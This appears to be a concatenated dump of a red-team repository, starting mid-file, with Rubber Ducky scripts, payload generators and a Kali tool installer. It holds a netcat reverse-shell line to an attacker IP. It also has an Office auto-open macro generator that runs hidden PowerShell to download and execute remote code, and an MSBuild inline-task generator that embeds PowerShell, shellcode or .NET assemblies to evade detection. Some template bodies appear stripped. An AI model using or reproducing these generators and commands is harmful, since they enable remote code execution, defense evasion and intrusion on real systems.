[ATTACKER IP] 4444 -e cmd.exe 28 | ENTER 29 | REM --> Minimize windows again so Terminal doesnt just stay in front of the Screen 30 | DELAY 500 31 | WINDOWS d 32 | DELAY 500 33 | ENTER 34 | -------------------------------------------------------------------------------- /Misc/Rubber Ducky/README.md: -------------------------------------------------------------------------------- 1 | These scripts are basic in the use of powershell, no obfuscation or crazy bypass techniques they are simple POC 2 | -------------------------------------------------------------------------------- /Misc/Rubber Ducky/Rubber-Ducky-README.md: -------------------------------------------------------------------------------- 1 | These scripts are mean't for the Rubber Ducky Tool from Hak5, it should be very simple to understand and the majority use PowerShell 2 | for executing, downloading, reading, etc, etc. Should switch to other languages or simply use cmd, but for now use the simplicity 3 | and easyness of PowerShell. SHOULD ADD MORE LATER. 4 | -------------------------------------------------------------------------------- /Payloads/Generators/BAT-Generator.py: -------------------------------------------------------------------------------- 1 | # This can probably be used later to obfuscate 2 | # SImple POC does not Bypass NADA 3 | 4 | print(""" 5 | __________ ________________ 6 | \______ \ / _ \__ ___/ 7 | | | _/ / /_\ \| | 8 | | | \/ | \ | 9 | |______ /\____|__ /____| 10 | \/ \/ 11 | ________ __ 12 | / _____/ ____ ____ ________________ _/ |_ ___________ 13 | / \ ____/ __ \ / \_/ __ \_ __ \__ \\ __\/ _ \_ __ \ 14 | \ \_\ \ ___/| | \ ___/| | \// __ \| | ( <_> ) | \/ 15 | \______ /\___ >___| /\___ >__| (____ /__| \____/|__| 16 | """) 17 | 18 | bat_n = input ("File Name >> ") 19 | 20 | bat_payload = bat_n + ".bat" 21 | 22 | bat = "@echo OFF\n" 23 | bat +="C:\\Windows\\System32\\cmd.exe" 24 | 25 | batf = open(bat_payload, 'w') 26 | batf.write(bat) 27 | batf.close() 28 | 29 | print("File saved as: " + bat_payload) 30 | 31 | -------------------------------------------------------------------------------- /Payloads/Generators/HTA-Generator.py: -------------------------------------------------------------------------------- 1 | # /usr/bin/python3 env 2 | # A simple HTA Generator 3 | # This can be used to later Obfuscate 4 | # Simple POC does not BYpass AV 5 | print(""" 6 | _ _ _______ _____ _ 7 | | | | |__ __|/\ / ____| | | 8 | | |__| | | | / \ | | __ ___ _ __ ___ _ __ __ _| |_ ___ _ __ 9 | | __ | | | / /\ \ | | |_ |/ _ \ '_ \ / _ \ '__/ _` | __/ _ \| '__| 10 | | | | | | |/ ____ \ | |__| | __/ | | | __/ | | (_| | || (_) | | 11 | |_| |_| |_/_/ \_\ \_____|\___|_| |_|\___|_| \__,_|\__\___/|_| 12 | 13 | """) 14 | html_title = input ("Choose an HTML Title >>") 15 | app_name = input ("Choose App Name >>") 16 | payload_n = input ("Payload Name >>") 17 | print ("Example: http://example:80/Payload.ps1") 18 | URL = input("Enter Full URL with PS1 payload name >>") 19 | 20 | hta_payload = payload_n + ".hta" 21 | 22 | hta = "\n" 23 | hta += "\n" 24 | hta += "\n" 25 | hta += "\n" 26 | hta += "" + html_title + "\n" 27 | hta += "\n" 36 | hta += "\n" 45 | hta += "\n" 46 | hta += "\n" 47 | hta += "\n" 48 | hta += "\n" 49 | 50 | hf = open(hta_payload, 'w') 51 | hf.write(hta) 52 | hf.close() 53 | 54 | print ("File saved as: " + hta_payload) 55 | -------------------------------------------------------------------------------- /Payloads/Generators/MSBuildXMLPayload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # 3 | # Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or 4 | # .NET/CLR assembly EXE file into inline-task XML file that can be further launched by: 5 | # 6 | # %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 7 | # or 8 | # %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe 9 | # 10 | # This script can embed following data within constructed CSharp Task: 11 | # - Powershell code 12 | # - raw Shellcode in a separate thread via CreateThread 13 | # - .NET Assembly via Assembly.Load 14 | # 15 | # Mariusz B. / mgeeky, 16 | # 17 | 18 | import re 19 | import os 20 | import io 21 | import sys 22 | import gzip 23 | import base64 24 | import string 25 | import struct 26 | import random 27 | import binascii 28 | import argparse 29 | 30 | 31 | def getCompressedPayload(filePath): 32 | out = io.BytesIO() 33 | encoded = '' 34 | with open(filePath, 'rb') as f: 35 | inp = f.read() 36 | 37 | with gzip.GzipFile(fileobj = out, mode = 'w') as fo: 38 | fo.write(inp) 39 | 40 | encoded = base64.b64encode(out.getvalue()) 41 | 42 | powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( 43 | encoded.decode() 44 | ) 45 | return powershell 46 | 47 | def getInlineTask(payload, _format): 48 | 49 | templateName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15))) 50 | taskName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15))) 51 | 52 | launchCode = '' 53 | 54 | if _format == 'exe': 55 | 56 | exeLaunchCode = string.Template(''' 57 | 58 | 59 | 60 | 61 | 62 | 71 | ''').safe_substitute( 72 | payload2 = base64.b64encode(payload.encode()).decode() 73 | ) 74 | 75 | 76 | launchCode = exeLaunchCode 77 | 78 | elif _format == 'raw': 79 | 80 | foo = str(binascii.hexlify(payload), 'ascii') 81 | fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] 82 | encodedPayload = ' ' 83 | 84 | for i in range(len(fooarr)): 85 | if i % 32 == 0 and i > 0: 86 | encodedPayload += '\n ' 87 | encodedPayload += '{}, '.format(fooarr[i]) 88 | 89 | encodedPayload = encodedPayload.strip()[:-1] 90 | 91 | shellcodeLoader = string.Template(''' 92 | 93 | 94 | 147 | ''').safe_substitute( 148 | templateName = templateName, 149 | payload2 = encodedPayload, 150 | payloadSize = len(payload) 151 | ) 152 | 153 | launchCode = shellcodeLoader 154 | 155 | else: 156 | powershellLaunchCode = string.Template(''' 157 | 158 | 159 | 183 | ''').safe_substitute( 184 | templateName = templateName, 185 | payload2 = base64.b64encode(payload.encode()).decode() 186 | ) 187 | 188 | launchCode = powershellLaunchCode 189 | 190 | 191 | template = string.Template(''' 192 | 193 | 194 | 195 | 196 | 197 | 198 | <$templateName /> 199 | 200 | 202 | $launchCode 203 | 204 | 205 | ''').safe_substitute( 206 | taskName = taskName, 207 | templateName = templateName, 208 | launchCode = launchCode 209 | ) 210 | 211 | return template 212 | 213 | def detectFileIsExe(filePath, forced = False): 214 | first1000 = [] 215 | 216 | with open(filePath, 'rb') as f: 217 | first1000 = f.read()[:1000] 218 | 219 | if not (first1000[0] == 'M' and first1000[1] == 'Z'): 220 | return False 221 | 222 | elfanew = struct.unpack('\s*\n', '', output) 236 | output = output.replace('\n', '') 237 | output = re.sub(r'\s{2,}', ' ', output) 238 | output = re.sub(r'\s+([^\w])\s+', r'\1', output) 239 | output = re.sub(r'([^\w"])\s+', r'\1', output) 240 | 241 | variables = { 242 | 'payload' : 'x', 243 | 'method' : 'm', 244 | 'asm' : 'a', 245 | 'instance' : 'o', 246 | 'pipeline' : 'p', 247 | 'runspace' : 'r', 248 | 'decoded' : 'd', 249 | 'MEM_COMMIT' : 'c1', 250 | 'PAGE_EXECUTE_READWRITE' : 'c2', 251 | 'MEM_RELEASE' : 'c3', 252 | 'funcAddr' : 'v1', 253 | 'hThread' : 'v2', 254 | 'threadId' : 'v3', 255 | 'lpAddress' : 'p1', 256 | 'dwSize' : 'p2', 257 | 'flAllocationType' : 'p3', 258 | 'flProtect' : 'p4', 259 | 'dwFreeType' : 'p5', 260 | 'lpThreadAttributes' : 'p6', 261 | 'dwStackSize' : 'p7', 262 | 'lpStartAddress' : 'p8', 263 | 'param' : 'p9', 264 | 'dwCreationFlags' : 'p10', 265 | 'lpThreadId' : 'p11', 266 | 'dwMilliseconds' : 'p12', 267 | 'hHandle' : 'p13', 268 | } 269 | 270 | for k, v in variables.items(): 271 | output = output.replace(k, v) 272 | 273 | return output 274 | 275 | def opts(argv): 276 | parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] ') 277 | parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.') 278 | parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.') 279 | parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.') 280 | parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!') 281 | parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.') 282 | 283 | args = parser.parse_args() 284 | 285 | if args.exe and args.raw: 286 | sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n') 287 | sys.exit(-1) 288 | 289 | return args 290 | 291 | def main(argv): 292 | sys.stderr.write(''' 293 | :: Powershell via MSBuild inline-task XML payload generation script 294 | To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' 295 | Mariusz B. / mgeeky, 296 | 297 | ''') 298 | if len(argv) < 2: 299 | print('Usage: ./generateMSBuildXML.py ') 300 | sys.exit(-1) 301 | 302 | args = opts(argv) 303 | 304 | _format = 'powershell' 305 | 306 | if args.exe: 307 | if not detectFileIsExe(args.inputFile, args.exe): 308 | sys.stderr.write('[?] File not recognized as PE/EXE.\n\n') 309 | return False 310 | 311 | _format = 'exe' 312 | sys.stderr.write('[?] File recognized as PE/EXE.\n\n') 313 | with open(args.inputFile, 'rb') as f: 314 | payload = f.read() 315 | 316 | elif args.raw: 317 | _format = 'raw' 318 | sys.stderr.write('[?] File specified as raw Shellcode.\n\n') 319 | with open(args.inputFile, 'rb') as f: 320 | payload = f.read() 321 | 322 | else: 323 | sys.stderr.write('[?] File not recognized as PE/EXE.\n\n') 324 | 325 | if args.inputFile.endswith('.exe'): 326 | return False 327 | 328 | payload = getCompressedPayload(args.inputFile) 329 | 330 | output = getInlineTask(payload, _format) 331 | 332 | if args.minimize: 333 | output = minimize(output) 334 | 335 | if args.encode: 336 | print(base64.b64encode(output)) 337 | else: 338 | print(output) 339 | 340 | msbuildPath = r'%WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 341 | if 'PROGRAMFILES(X86)' in os.environ: 342 | msbuildPath = r'%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe' 343 | 344 | sys.stderr.write(''' 345 | 346 | ===================================== 347 | 348 | Execute this XML file like so: 349 | 350 | {} file.xml 351 | '''.format(msbuildPath)) 352 | 353 | if __name__ == '__main__': 354 | main(sys.argv) 355 | -------------------------------------------------------------------------------- /Payloads/Generators/Macro-Generator.py: -------------------------------------------------------------------------------- 1 | # /usr/bin/python3 env 2 | # A simpe Macro Generator 3 | # Simple POC, this can be used with other tools to obfuscate 4 | # Will Bypass nothing 5 | 6 | print (""" 7 | __ __ _____ _ 8 | | \/ | / ____| | | 9 | | \ / | __ _ ___ _ __ ___ ______| | __ ___ _ __ ___ _ __ __ _| |_ ___ _ __ 10 | | |\/| |/ _` |/ __| '__/ _ \______| | |_ |/ _ \ '_ \ / _ \ '__/ _` | __/ _ \| '__| 11 | | | | | (_| | (__| | | (_) | | |__| | __/ | | | __/ | | (_| | || (_) | | 12 | |_| |_|\__,_|\___|_| \___/ \_____|\___|_| |_|\___|_| \__,_|\__\___/|_| 13 | 14 | 15 | """) 16 | 17 | macro_name = input ("Choose File name >>") 18 | print ("Example: http://example:80/Payload.ps1") 19 | url = input ("Enter Full URL payload with PS Filename included >>") 20 | 21 | macro_payload = macro_name + '.vbs' 22 | macro = "Sub Auto_Open()\n" 23 | macro += " Dim exec As String\n" 24 | macro += " Dim payload As String\n" 25 | macro += """ exec = "powershell.exe -WindowStyle hidden -nologo -noprofile -c ""IEX ((New-Object Net.WebClient).DownloadString""" 26 | macro += "('" 27 | macro += str(url) 28 | macro += "'))\"\"\"\n" 29 | macro += " Shell (exec)\n" 30 | macro += "End Sub\n" 31 | macro += "Sub AutoOpen()\n" 32 | macro += " Auto_Open\n" 33 | macro += "End Sub\n" 34 | macro += "Sub Workbook_Open()\n" 35 | macro += " Auto_Open\n" 36 | macro += "End Sub\n" 37 | 38 | macrof = open(macro_payload, 'w') 39 | macrof.write(macro) 40 | macrof.close() 41 | 42 | print ("File saved as: " + macro_name) 43 | 44 | -------------------------------------------------------------------------------- /Payloads/Generators/Padding.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/env python3 2 | #Python3 padding.py [file] [size] [-mb/-kb] 3 | 4 | import sys 5 | if len (sys.argv) < 4: 6 | sys.exit("[Missing Arguments!!\n [+] Usage: Python3 Padding.py [file] [size] [-mb/kb]") 7 | 8 | bp = sys.argv[1] 9 | size = int(sys.argv[2]) 10 | tp = sys.argv[3] 11 | 12 | f = open(bp, 'ab') 13 | if tp == '-kb': 14 | b_size = size * 1024 15 | elif tp == '-mb': 16 | b_size = size * 1048576 17 | else: 18 | sys.exit('[+] Use -mb or -kb!') 19 | 20 | buffersize = 256 21 | 22 | for i in range(b_size // buffersize): 23 | f.write(b"0" * buffersize) 24 | 25 | f.close() 26 | 27 | print ("[+] Finished Padding ", bp, "with ", size, tp) 28 | -------------------------------------------------------------------------------- /Payloads/Generators/README.md: -------------------------------------------------------------------------------- 1 | Simple Payload Generatos to cut time on these will not Bypass nothing they are simple POC to be guided with, you can 2 | probably Obfuscate these who knows ¯\_(ツ)_/¯ 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Had to change the README as it makes more sense that the github was more related to the GITBOOK Page realted to Red Team Notes 2 | Will most likely start working on a repository for other stuff. 3 | -------------------------------------------------------------------------------- /Tool Installer/Tools-Kali-Installation.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 env 2 | # Favorite tools 3 | # Scripted cause I have to download again everytime I start fresh 4 | # It's annoying 5 | # This tool doesnt automatically install them....Yet 6 | # Won't work on that becasue I don't want it to force install any packages 7 | # Version 0.5 8 | # Added more tools and fixed some typos 9 | # Added the Names cause I would get lost 10 | # Added more installations steps so tools get a chance to be ready and installed 11 | # Kali linux Version 12 | ###################################### 13 | # 14 | # Current Tools 15 | # 16 | # Sn1per, CrossLinked,EvilCLippy, donut, DomainPasswordSpray, RedELK, Rubeus, BloodHOund, Kerberoast 17 | # MailSniper, Phantom Evasion, venom, Penetration Testing Tools (Red Team Folder), Empire, Macro_Pack 18 | # Covenant, Unicorn, SpookFLare,NetLoader, OSRFRAMEWORK, Wesng, GhostPack 19 | # spoofcheck, skiptracer, ScrapedIn, SimplyEmail (docker), typofinder, pwndb, spiderfoot, demiguise 20 | # Office-DDE-Payloads, EvilURL, SCT-Obfuscator, UACBypass Collection, CredSniper, Infoga, koadic, Scriblur 21 | # powerob, LethalHTA, vba-obfuscator, vba_obfuscator, impacket, SprayingToolKit, docker.io 22 | # 23 | ###################################### 24 | 25 | import subprocess 26 | import time 27 | import os 28 | 29 | print ("Tool installer for Red Team") 30 | print ("Or hacking in general") 31 | print ("THIS WILL NOT INSTALL THE TOOLS IT WILL JUST DOWNLOAD THE REPOS") 32 | print ("Please run as root files get saved on your '/opt' PATH") 33 | print ('') 34 | print ("Ready ?") 35 | 36 | # Extra packages so some of the tools work 37 | 38 | package1 ='https://packages.microsoft.com/config/ubuntu/19.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb' 39 | 40 | ready = input('> ') 41 | 42 | if ready == 'y': 43 | os.chdir('/opt') 44 | # First we will update and download a few necessary packages 45 | os.system('apt update') 46 | os.system('apt upgrade') 47 | os.system('apt dist-upgrade') 48 | os.system(' apt install python3-pip') 49 | os.system('wget -q ' + package1) 50 | os.system('dpkg -i packages-microsoft-prod.deb') 51 | # I can add more dependecies and install them so they are already avaialble 52 | # For example DOTNET for Covenant 53 | # More tools 0.2 54 | os.system('apt install exiftool') 55 | os.system('apt install gobuster') 56 | #os.system('apt install julia') # New programming language 57 | os.system('apt install docker') 58 | os.system('apt install docker.io') 59 | os.system('apt-get install dotnet-sdk-3.1') # This version is necessary for Covenant 60 | os.system('apt-get install apt-transport-https') 61 | os.system('pip3 install mitm6') 62 | # Tools 0.5 (Removed HiddenEye, Added Infoga, Rubeus,Phantom Evasion, MailSniper) 63 | # Added Various tools and fixed a few commands 64 | subprocess.call(['git', 'clone', 'https://github.com/1N3/Sn1per.git']) 65 | subprocess.call(['git', 'clone', 'https://github.com/m8r0wn/CrossLinked.git']) 66 | subprocess.call(['git', 'clone', 'https://github.com/outflanknl/EvilClippy.git']) 67 | subprocess.call(['git', 'clone', 'https://github.com/TheWover/donut.git']) 68 | subprocess.call(['git', 'clone', 'https://github.com/dafthack/DomainPasswordSpray.git']) 69 | subprocess.call(['git', 'clone', 'https://github.com/outflanknl/RedELK.git']) 70 | subprocess.call(['git', 'clone', 'https://github.com/GhostPack/Rubeus.git']) 71 | subprocess.call(['wget', 'https://github.com/BloodHoundAD/BloodHound/releases/download/3.0.4/BloodHound-linux-x64.zip']) 72 | subprocess.call(['git', 'clone', 'https://github.com/nidem/kerberoast.git']) 73 | subprocess.call(['git', 'clone', 'https://github.com/dafthack/MailSniper.git']) 74 | subprocess.call(['git', 'clone', 'https://github.com/oddcod3/Phantom-Evasion.git']) 75 | subprocess.call(['git', 'clone', 'https://github.com/r00t-3xp10it/venom.git']) 76 | subprocess.call(['svn', 'checkout', 'https://github.com/mgeeky/Penetration-Testing-Tools/trunk/red-teaming']) 77 | subprocess.call(['git', 'clone', 'https://github.com/BC-SECURITY/Empire.git']) 78 | subprocess.call(['git', 'clone', 'https://github.com/sevagas/macro_pack.git']) 79 | subprocess.call(['git', 'clone', '--recursive', 'https://github.com/cobbr/Covenant.git']) 80 | subprocess.call(['git', 'clone', 'https://github.com/trustedsec/unicorn.git']) 81 | subprocess.call(['git', 'clone', 'https://github.com/hlldz/SpookFlare.git']) 82 | subprocess.call(['git', 'clone', 'https://github.com/Flangvik/NetLoader.git']) 83 | subprocess.call(['apt', 'install', 'osrframework']) 84 | subprocess.call(['git', 'clone', 'https://github.com/bitsadmin/wesng.git']) 85 | subprocess.call(['git', 'clone', 'https://github.com/r3motecontrol/Ghostpack-CompiledBinaries.git']) 86 | subprocess.call(['git', 'clone', 'https://github.com/BishopFox/spoofcheck.git']) 87 | subprocess.call(['git', 'clone', 'https://github.com/xillwillx/skiptracer.git']) 88 | subprocess.call(['git', 'clone', 'https://github.com/dchrastil/ScrapedIn.git']) 89 | subprocess.call(['git', 'clone', 'https://github.com/SimplySecurity/SimplyEmail.git']) 90 | subprocess.call(['git', 'clone', 'https://github.com/nccgroup/typofinder.git']) 91 | subprocess.call(['git', 'clone', 'https://github.com/davidtavarez/pwndb.git']) 92 | subprocess.call(['git', 'clone', 'https://github.com/smicallef/spiderfoot.git']) 93 | subprocess.call(['git', 'clone', 'https://github.com/nccgroup/demiguise.git']) 94 | subprocess.call(['git', 'clone', 'https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads.git']) 95 | subprocess.call(['git', 'clone', 'https://github.com/UndeadSec/EvilURL.git']) 96 | subprocess.call(['git', 'clone', 'https://github.com/Mr-Un1k0d3r/SCT-obfuscator.git']) 97 | subprocess.call(['git', 'clone', 'https://github.com/api0cradle/UltimateAppLockerByPassList.git']) 98 | subprocess.call(['git', 'clone', 'https://github.com/ustayready/CredSniper.git']) 99 | subprocess.call(['git', 'clone', 'https://github.com/m4ll0k/Infoga.git']) 100 | subprocess.call(['git', 'clone', 'https://github.com/zerosum0x0/koadic.git']) 101 | subprocess.call(['git', 'clone', 'https://github.com/nins3i/Scriblur.git']) 102 | subprocess.call(['git', 'clone', 'https://github.com/cwolff411/powerob.git']) 103 | subprocess.call(['git', 'clone', 'https://github.com/codewhitesec/LethalHTA.git']) 104 | subprocess.call(['git', 'clone', 'https://github.com/m8r0wn/CrossLinked.git']) 105 | subprocess.call(['git', 'clone', 'https://github.com/bonnetn/vba-obfuscator.git']) 106 | subprocess.call(['git', 'clone', 'https://github.com/ch4meleon/vba_obfuscator.git']) 107 | subprocess.call(['git', 'clone', 'https://github.com/SecureAuthCorp/impacket.git']) 108 | subprocess.call(['git', 'clone', 'https://github.com/byt3bl33d3r/SprayingToolkit.git']) 109 | subprocess.call(['git', 'clone', '--recurse-submodules', 'https://github.com/cobbr/Covenant']) 110 | # This will install Spider requirements 111 | # subprocess.call(['pip', 'install', '-r', '/opt/spiderfoot/requirements.txt')] 112 | # Continue with tools 113 | # Installing packages 114 | elif ready == 'n': 115 | print ("OK") 116 | 117 | --------------------------------------------------------------------------------